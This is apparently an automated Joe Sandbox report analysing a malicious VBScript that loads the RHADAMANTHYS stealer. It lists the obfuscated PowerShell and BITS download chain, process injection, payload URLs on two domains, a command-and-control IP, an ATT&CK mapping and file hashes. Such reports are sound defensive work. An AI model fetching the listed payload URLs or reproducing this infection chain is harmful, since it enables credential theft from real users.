                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected RHADAMANTHYS Stealer
                      Source: Yara matchFile source: 0000000A.00000003.1761896364.0000000003010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.1835517097.0000000005501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2611366483.00000000053C1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000003.1770106522.00000000240B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000003.1758009836.0000000002800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      barindex
                      Yara detected RHADAMANTHYS Stealer
                      Source: Yara matchFile source: 0000000A.00000003.1761896364.0000000003010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.1835517097.0000000005501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2611366483.00000000053C1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000003.1770106522.00000000240B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000003.1758009836.0000000002800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 10_2_053C9A57 socket,WSAGetLastError,SetHandleInformation,GetLastError,closesocket,bind,WSAGetLastError,10_2_053C9A57

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information221
                      Scripting                      		Valid Accounts11
                      Windows Management Instrumentation                      		1
                      BITS Jobs                      		111
                      Process Injection                      		1
                      Masquerading                      		OS Credential Dumping131
                      Security Software Discovery                      		Remote Services1
                      Archive Collected Data                      		11
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts2
                      Command and Scripting Interpreter                      		221
                      Scripting                      		1
                      DLL Side-Loading                      		51
                      Virtualization/Sandbox Evasion                      		LSASS Memory1
                      Process Discovery                      		Remote Desktop ProtocolData from Removable Media1
                      Non-Standard Port                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Exploitation for Client Execution                      		1
                      DLL Side-Loading                      		Logon Script (Windows)1
                      BITS Jobs                      		Security Account Manager51
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin SharesData from Network Shared Drive2
                      Ingress Tool Transfer                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts2
                      PowerShell                      		Login HookLogin Hook111
                      Process Injection                      		NTDS1
                      Application Window Discovery                      		Distributed Component Object ModelInput Capture2
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                      Obfuscated Files or Information                      		LSA Secrets1
                      File and Directory Discovery                      		SSHKeylogging13
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Software Packing                      		Cached Domain Credentials123
                      System Information Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      DLL Side-Loading                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578212 Sample: tmkSAOF3GM.vbs Startdate: 19/12/2024 Architecture: WINDOWS Score: 100 31 www.royalengineeringllc.com 2->31 33 www.astenterprises.com.pk 2->33 35 2 other IPs or domains 2->35 51 Malicious sample detected (through community Yara rule) 2->51 53 Multi AV Scanner detection for submitted file 2->53 55 Yara detected RHADAMANTHYS Stealer 2->55 57 5 other signatures 2->57 10 wscript.exe 1 2->10         started        13 svchost.exe 1 1 2->13         started        signatures3 process4 dnsIp5 63 VBScript performs obfuscated calls to suspicious functions 10->63 65 Suspicious powershell command line found 10->65 67 Wscript starts Powershell (via cmd or directly) 10->67 69 2 other signatures 10->69 16 powershell.exe 24 10->16         started        41 astenterprises.com.pk 107.161.23.150, 443, 49711, 49717 RAMNODEUS United States 13->41 43 127.0.0.1 unknown unknown 13->43 signatures6 process7 signatures8 45 Suspicious powershell command line found 16->45 47 Powershell uses Background Intelligent Transfer Service (BITS) 16->47 49 Found suspicious powershell code related to unpacking or dynamic code loading 16->49 19 powershell.exe 23 16->19         started        22 conhost.exe 16->22         started        process9 signatures10 59 Writes to foreign memory regions 19->59 61 Found suspicious powershell code related to unpacking or dynamic code loading 19->61 24 wab.exe 1 6 19->24         started        process11 dnsIp12 37 royalengineeringllc.com 103.120.177.150, 443, 49781 NETMAGIC-APNetmagicDatacenterMumbaiIN India 24->37 27 dialer.exe 24->27         started        process13 dnsIp14 39 91.92.252.226, 49819, 49842, 49868 THEZONEBG Bulgaria 27->39 71 Switches to a custom stack to bypass stack traces 27->71 signatures15

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      tmkSAOF3GM.vbs36%VirustotalBrowse
                      tmkSAOF3GM.vbs24%ReversingLabsScript-WScript.Trojan.Heuristic

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://www.astenterprises.com.pk/0%Avira URL Cloudsafe
                      https://www.astenterprises.com.pk/ms/Nonn215.prm0%Avira URL Cloudsafe
                      https://www.astenterprises.com.pk/C20%Avira URL Cloudsafe
                      https://www.royalengineeringllc.com/ms/ms.bin0%Avira URL Cloudsafe
                      https://www.royalengineeringllc.com/ms/ms.binC0%Avira URL Cloudsafe
                      https://www.astenterprises.com.pk/5e0%Avira URL Cloudsafe
                      https://www.astenterprises.com.pk:443/ms/Nonn215.prm0%Avira URL Cloudsafe
                      https://www.astenterprises.com.pk/ms/Nonn215.prmP0%Avira URL Cloudsafe
                      https://www.astenterprises.com.pk/ms/Nonn215.prm/C:0%Avira URL Cloudsafe
                      https://www.royalengineeringllc.com/ms/ms.binI0%Avira URL Cloudsafe
                      https://www.astenterprises.com.pk/ms/Nonn215.prmXR0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      astenterprises.com.pk
                      		107.161.23.150
                      		truefalse
                        		unknown
                        royalengineeringllc.com
                        		103.120.177.150
                        		truefalse
                          		unknown
                          www.astenterprises.com.pk
                          		unknown
                          		unknownfalse
                            		unknown
                            www.royalengineeringllc.com
                            		unknown
                            		unknownfalse
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              https://www.astenterprises.com.pk/ms/Nonn215.prmfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.royalengineeringllc.com/ms/ms.binfalse
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1966922652.000001EC5E145000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1733782746.0000000005CFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.1732706007.0000000004DDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.1732706007.0000000004DDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://go.micropowershell.exe, 00000003.00000002.1845588983.000001EC4F25E000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.astenterprises.com.pk/ms/Nonn215.prmXRpowershell.exe, 00000006.00000002.1732706007.0000000004DDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://contoso.com/Licensepowershell.exe, 00000006.00000002.1733782746.0000000005CFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://contoso.com/Iconpowershell.exe, 00000006.00000002.1733782746.0000000005CFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 00000005.00000003.1349172359.000001F91D820000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.1732706007.0000000004DDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.astenterprises.com.pk/svchost.exe, 00000005.00000002.2612981154.000001F91DAC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.astenterprises.com.pk/C2svchost.exe, 00000005.00000002.2612981154.000001F91DAC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.astenterprises.com.pk/5esvchost.exe, 00000005.00000002.2612981154.000001F91DAC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://g.live.com/odclientsettings/Prod1C:svchost.exe, 00000005.00000003.1349172359.000001F91D879000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://crl.micropowershell.exe, 00000006.00000002.1735332796.0000000007620000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://aka.ms/pscore6lBpowershell.exe, 00000006.00000002.1732706007.0000000004C91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://contoso.com/powershell.exe, 00000006.00000002.1733782746.0000000005CFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1966922652.000001EC5E145000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1733782746.0000000005CFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.astenterprises.com.pk:443/ms/Nonn215.prmsvchost.exe, 00000005.00000002.2612855786.000001F91DA61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2612894209.000001F91DA95000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://www.royalengineeringllc.com/ms/ms.binIwab.exe, 00000008.00000002.1771543069.0000000007528000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://aka.ms/pscore68powershell.exe, 00000003.00000002.1845588983.000001EC4E0D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.royalengineeringllc.com/ms/ms.binCwab.exe, 00000008.00000002.1771543069.0000000007528000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1845588983.000001EC4E0D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1732706007.0000000004C91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.astenterprises.com.pk/ms/Nonn215.prmPpowershell.exe, 00000003.00000002.1845588983.000001EC4E289000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://www.astenterprises.com.pk/ms/Nonn215.prm/C:svchost.exe, 00000005.00000003.1432823810.000001F91D821000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2612645168.000001F91D980000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2609990879.0000009FF8A7B000.00000004.00000010.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown

                                                            World Map of Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public IPs

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            107.161.23.150
                                                            		astenterprises.com.pkUnited States
                                                            		3842RAMNODEUSfalse
                                                            91.92.252.226
                                                            		unknownBulgaria
                                                            		34368THEZONEBGfalse
                                                            103.120.177.150
                                                            		royalengineeringllc.comIndia
                                                            		17439NETMAGIC-APNetmagicDatacenterMumbaiINfalse

                                                            Private

                                                            IP
                                                            127.0.0.1

                                                            General Information

                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1578212
                                                            Start date and time:2024-12-19 12:36:23 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 8m 32s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:14
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:tmkSAOF3GM.vbs
                                                            renamed because original name is a hash value
                                                            Original Sample Name:25a284f3b492b1ef2573a114972267914935fdd0970888c32e96bdf2f5cf132f.vbs
                                                            Detection:MAL
                                                            Classification:mal100.troj.expl.evad.winVBS@11/11@3/4
                                                            EGA Information:
                                                            • Successful, ratio: 50%
                                                            HCA Information:
                                                            • Successful, ratio: 51%
                                                            • Number of executed functions: 40
                                                            • Number of non-executed functions: 35
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .vbs

                                                            Warnings

                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                            • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.12.23.50
                                                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                            • Execution Graph export aborted for target powershell.exe, PID 8112 because it is empty
                                                            • Execution Graph export aborted for target wab.exe, PID 6344 because there are no executed function
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            06:37:25API Interceptor125x Sleep call for process: powershell.exe modified
                                                            06:37:27API Interceptor2x Sleep call for process: svchost.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            107.161.23.150FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                              yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                                                0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                                                  List of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                    List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                      List of required items and services pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                        List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                          List of required items and services pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                            xw0K5Lahxz.exeGet hashmaliciousUnknownBrowse

                                                                              Domains

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext

                                                                              ASNs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              NETMAGIC-APNetmagicDatacenterMumbaiINakcqrfutuo.elfGet hashmaliciousUnknownBrowse
                                                                              • 123.108.47.170
                                                                              jew.x86.elfGet hashmaliciousUnknownBrowse
                                                                              • 103.227.39.94
                                                                              arm7.nn-20241201-1515.elfGet hashmaliciousMirai, OkiruBrowse
                                                                              • 164.52.192.3
                                                                              SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 205.147.111.116
                                                                              la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                              • 123.108.36.64
                                                                              la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                              • 103.225.99.96
                                                                              la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                              • 203.112.146.8
                                                                              ATT037484_Msg#189815.htmlGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                              • 164.52.219.207
                                                                              na.elfGet hashmaliciousGafgytBrowse
                                                                              • 103.214.114.30
                                                                              na.elfGet hashmaliciousGafgytBrowse
                                                                              • 103.214.114.27
                                                                              THEZONEBGcclent.exeGet hashmaliciousQuasarBrowse
                                                                              • 91.92.243.191
                                                                              cobaltstrike.dllGet hashmaliciousCobaltStrikeBrowse
                                                                              • 91.92.250.70
                                                                              sample.binGet hashmaliciousOkiruBrowse
                                                                              • 91.92.246.113
                                                                              mirai.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                              • 85.217.215.190
                                                                              SecuriteInfo.com.Win32.BotX-gen.7614.10551.exeGet hashmaliciousUnknownBrowse
                                                                              • 91.92.242.236
                                                                              Scan_Revised-SOP_MCA_pdf.jsGet hashmaliciousWSHRATBrowse
                                                                              • 91.92.243.39
                                                                              na.elfGet hashmaliciousMirai, MoobotBrowse
                                                                              • 85.217.208.78
                                                                              m7DmyQOKD7.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                              • 91.92.255.109
                                                                              mipsel.nn.elfGet hashmaliciousOkiruBrowse
                                                                              • 91.92.246.113
                                                                              arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                              • 91.92.246.113
                                                                              RAMNODEUSFjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                                              • 107.161.23.150
                                                                              yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                                                              • 107.161.23.150
                                                                              0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                                                              • 107.161.23.150
                                                                              List of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                              • 107.161.23.150
                                                                              List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                              • 107.161.23.150
                                                                              List of required items and services pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                              • 107.161.23.150
                                                                              List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                              • 107.161.23.150
                                                                              List of required items and services pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                              • 107.161.23.150
                                                                              owari.x86.elfGet hashmaliciousUnknownBrowse
                                                                              • 168.235.88.56
                                                                              owari.ppc.elfGet hashmaliciousUnknownBrowse
                                                                              • 168.235.65.115

                                                                              JA3 Fingerprints

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              28a2c9bd18a11de089ef85a160da29e4JiZQEd33mn.exeGet hashmaliciousUnknownBrowse
                                                                              • 107.161.23.150
                                                                              urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                              • 107.161.23.150
                                                                              https://walli.shanga.co/image/view/?id=1375Get hashmaliciousUnknownBrowse
                                                                              • 107.161.23.150
                                                                              Doc_16-48-43.jsGet hashmaliciousUnknownBrowse
                                                                              • 107.161.23.150
                                                                              Doc_16-48-43.jsGet hashmaliciousUnknownBrowse
                                                                              • 107.161.23.150
                                                                              Doc_23-03-27.jsGet hashmaliciousUnknownBrowse
                                                                              • 107.161.23.150
                                                                              Doc_23-03-27.jsGet hashmaliciousUnknownBrowse
                                                                              • 107.161.23.150
                                                                              Recommended Itinerary.jsGet hashmaliciousUnknownBrowse
                                                                              • 107.161.23.150
                                                                              d2W4YpqsKg.lnkGet hashmaliciousLummaCBrowse
                                                                              • 107.161.23.150
                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                              • 107.161.23.150
                                                                              37f463bf4616ecd445d4a1937da06e19t5lpvahkgypd7wy.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                              • 103.120.177.150
                                                                              Overheaped237.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 103.120.177.150
                                                                              Corporate_Code_of_Ethics_and_Business_Conduct_Policy_2024.pdf.lnk.d.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                              • 103.120.177.150
                                                                              main.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                              • 103.120.177.150
                                                                              deb.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                              • 103.120.177.150
                                                                              iviewers.dllGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                              • 103.120.177.150
                                                                              script.ps1Get hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                              • 103.120.177.150
                                                                              66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                              • 103.120.177.150
                                                                              pM3fQBuTLy.exeGet hashmaliciousVidarBrowse
                                                                              • 103.120.177.150
                                                                              script.htaGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                              • 103.120.177.150

                                                                              Dropped Files

                                                                              No context

                                                                              Created / dropped Files

                                                                              C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1310720
                                                                              Entropy (8bit):0.7274771706429154
                                                                              Encrypted:false
                                                                              SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6VqQ:2JIB/wUKUKQncEmYRTwh0o
                                                                              MD5:B4997D5CD3C9E4E17BEF4485082F17C3
                                                                              SHA1:FA361F88E897AD2F4F7D9A5AADF86E3D72CA3DFD
                                                                              SHA-256:9D2E58E82B9DB54ED31564CA394BF1D8726288BB986D4245CB5E6B748268B66B
                                                                              SHA-512:DAC31242D6D8C105BC93D41632F754C1C035851311F12976E23463DFFC4F40F0B84838292DA63E62BD02D9D84759008A0FC9C1C8959C17392A24F4ACA918FB84
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x51c2449b, page size 16384, DirtyShutdown, Windows version 10.0
                                                                              Category:dropped
                                                                              Size (bytes):1310720
                                                                              Entropy (8bit):0.7899920066804679
                                                                              Encrypted:false
                                                                              SSDEEP:1536:TSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:TazaPvgurTd42UgSii
                                                                              MD5:0CC66C38BD0B4B421C8E08A993E33E12
                                                                              SHA1:C1EE498C288EB553F513C78C74BF27A9CCB9851D
                                                                              SHA-256:FFA64D794C482C27C7D1D338F65D999AF6605B00562CE8529922534A302A7663
                                                                              SHA-512:58A5B6F55E8335120DD12C4AF902967E549840A0EF44CDE5C4532F93869017E2DFC43CA3241D017EB8016B4F7248B712D5C9C6B62DFFC2BFC60684709A0A19D9
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:Q.D.... ...............X\...;...{......................0.`.....42...{5..%...|..h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{..................................4[5..%...|..................KT.D.%...|...........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):16384
                                                                              Entropy (8bit):0.0809350900840648
                                                                              Encrypted:false
                                                                              SSDEEP:3:+HXllyYeJCURz1t/57Dek3JB/u2El/llallEqW3l/TjzzQ/t:+VlyzJTzHR3tMtAmd8/
                                                                              MD5:D2BAC8B8DD912739366870BD911EFE39
                                                                              SHA1:37A89E61B8F877C6D65282A6C977306629D72C2D
                                                                              SHA-256:3294470388091F967DA9DFE9AEB816B67B59E8693FA58511795735E85DC9CDD1
                                                                              SHA-512:5AC88FD5B7BC8FB01BBB889FA39D151E550F30F67D6E067D2C591DDFDB77A15681D6F20B0DB5F3D3AAC3B2FA5A026571821A92B81E694713B61C1244543CF997
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:!r.?.....................................;...{...%...|..42...{5.........42...{5.42...{5...Y.42...{59................KT.D.%...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:modified
                                                                              Size (bytes):11914
                                                                              Entropy (8bit):4.899333871080548
                                                                              Encrypted:false
                                                                              SSDEEP:192:Zxoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9e:Srib4Z1VoGIpN6KQkj2qkjh4iUxFT6YP
                                                                              MD5:CCBF995F792F22E6407E0EDC999E526B
                                                                              SHA1:2E7FE0790FF894F3B6308588F3554831EB8F86A3
                                                                              SHA-256:7033B857924CA666154A2B1511CB0402232D32658846E3472129C6972A8ECB31
